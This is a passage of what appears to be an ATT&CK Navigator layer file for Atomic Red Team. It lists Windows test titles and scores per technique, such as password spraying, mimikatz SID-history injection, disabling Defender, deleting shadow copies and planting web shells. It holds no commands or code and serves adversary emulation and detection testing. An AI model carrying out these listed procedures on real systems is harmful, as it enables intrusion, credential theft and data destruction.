Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":4,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n- ESXi - Brute Force Until Account Lockout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.001","score":1,"enabled":true,"comment":"\n- Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n- Running DLL with .init extension and function\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View 